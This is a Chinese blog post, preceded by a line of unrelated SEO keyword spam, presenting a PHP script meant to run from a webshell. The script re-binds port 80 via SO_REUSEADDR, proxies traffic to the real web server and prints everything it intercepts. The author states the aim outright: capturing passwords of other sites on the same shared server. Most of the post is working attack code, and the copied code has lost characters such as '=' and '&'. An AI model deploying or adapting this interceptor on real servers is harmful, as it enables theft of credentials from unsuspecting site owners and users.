个人做电商网站icp,二手房网站怎么做才能接到电话,东莞网站建设 家具,桂林哪里做网站前几天刺在我们的maillist发了一个老外写的文章#xff0c;大意是可以用php来实现数据的劫持和转发。我瞄了一下#xff0c;确实可行#xff0c;于是今天抽出了以前用来扯淡的时间#xff0c;写了段代码验证了一下想法。老外的原文是一个PDF#xff0c;有兴趣看的可以看看…前几天刺在我们的maillist发了一个老外写的文章大意是可以用php来实现数据的劫持和转发。我瞄了一下确实可行于是今天抽出了以前用来扯淡的时间写了段代码验证了一下想法。老外的原文是一个PDF有兴趣看的可以看看。地址是在http://www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf。其实关于这个的原理我记得很早很早之前flashsky就在xfocus上面贴过通过SO_REUSEADDR实现端口重复绑定的mix还写过一个 guest权限嗅探密码的。我这里比较不同的是用php实现的可以在webshell里面用当然我没有测试过我没shell。代码我注释得很详细个人觉得写得还不错不细说。这里大概说一下技术上的难点。首先是在web里面没有多线程也没有多进程但是每一个新连接进来就要去处理应该怎么做显然不能顺序执行因为光accept那里就会被阻塞住的而且后面每一个session也需要分别处理的。还好查手册发现经典的socket_select函数可用有这个就好说了专业实现多路复用的。PHP代码如下有详细注释。blog贴的所以代码可能会掉些东西其他的支持我就不提供了看代码class select{var $sockets;// 构造函数function select($sockets){$this-sockets array();foreach($sockets as $socket){$this-add($socket);}}function add($add_socket){//array_push($this-sockets, $add_socket);$this-sockets[] $add_socket;}// 利用临时数组来删除数组中的元素function remove($remove_socket){$tmp_sockets array();foreach($this-sockets as $socket){if($remove_socket ! $socket){$tmp_sockets[] $socket;}}$this-sockets $tmp_sockets;}// 检查socket数组是否可读传入超时时间返回socket数组function can_read($timeout){$read $this-sockets;socket_select( $read, $write NULL, $except NULL, $timeout );return $read;}// 检查socket数组是否可写传入超时时间返回socket数组function can_write($timeout){$write $this-sockets;socket_select( $read NULL, $write, $except NULL, $timeout );return $write;}}// 网页不超时set_time_limit(0);// 即时输出数据不缓冲ob_end_clean();ob_implicit_flush(true);if( !isset($_GET[listen_ip]) ){exit;}if( $_GET[listen_ip] ){exit;}$listen_ip $_GET[listen_ip];$listen_port 80;// 建立socket$listen_sock socket_create(AF_INET, SOCK_STREAM, SOL_TCP);// 设置重复绑定socket_set_option($listen_sock, SOL_SOCKET, SO_REUSEADDR, 1);// 明确指定绑定IP地址优先获取数据socket_bind($listen_sock, $listen_ip, $listen_port);// 开始监听socket_listen ($listen_sock);echo listen on .htmlentities($listen_ip). :.$listen_port.;// 创建socket数组使用select来轮询$check_socks array($listen_sock);// 映射客户端socket和服务端socket// $socket_maps1将客户端socket作为key// $socket_maps2将服务端socket作为key// 以内存换速度并且方便下面的搜索$socket_maps1 array( );$socket_maps2 array( );// 实例化select类$select new select( $check_socks );while(true){/*print_r( $socket_maps );print ;*/// select轮询超时2秒foreach ($select-can_read(1) as $socket){// listen_sock可读说明有人连接上来了if( $socket $listen_sock ){// 接受新连接并加入到轮训数组$new_client socket_accept($listen_sock);$select-add($new_client);socket_getpeername($new_client, $ip, $port);echo New client connected: $ip, $port;// 建立到真实服务器的socket$server_sock socket_create(AF_INET, SOCK_STREAM, SOL_TCP);socket_connect($server_sock,127.0.0.1, $listen_port);// 建立真实服务器socket和真实客户端socket之间的映射关系$socket_maps1[$new_client] $server_sock;$socket_maps2[$server_sock] $new_client;// 添加到select轮询中$select-add($server_sock);// $listen_sock的可读数据是因为有新连接已经处理了。暂时去掉因为下面开始处理数据转发//select-remove( $listen_sock );}// 其他socket可读表示有数据需要中转else{// 读取数据失败则从轮询socket中删除并关闭socket$client_data socket_read($socket, 1024, PHP_NORMAL_READ);if ($client_data false){socket_close( $socket );$select-remove( $socket );echo client disconnected.;continue;}// 如果socket在$socket_maps1的key中说明是从客户端读到了数据if( in_array( $socket, array_keys($socket_maps1)) ){//echo readed from client.;if( ! socket_write( $socket_maps1[$socket], $client_data ) ){socket_close( $socket );socket_close( $socket_maps1[$socket] );$select-remove( $socket );$select-remove( $socket_maps1[$socket] );print Write to server error.;}print htmlentities($client_data).;}// 否则如果socket在$socket_maps2的key中说明是从真正的web服务器读到了数据elseif( in_array( $socket, array_keys($socket_maps2) ) ){//echo readed from server.;if( ! socket_write( $socket_maps2[$socket], $client_data ) ){socket_close( $socket );socket_close( $socket_maps2[$socket] );$select-remove( $socket );$select-remove( $socket_maps2[$socket] );print Write to client error.;}print htmlentities($client_data).;}}}}?这个东西有什么作用自由发挥。也许你有一个webshell但是却想知道同一个服务器上面别人网站的密码……我是在windows xpapache测试的据我所知windows2003默认已经不准重复绑定端口了。
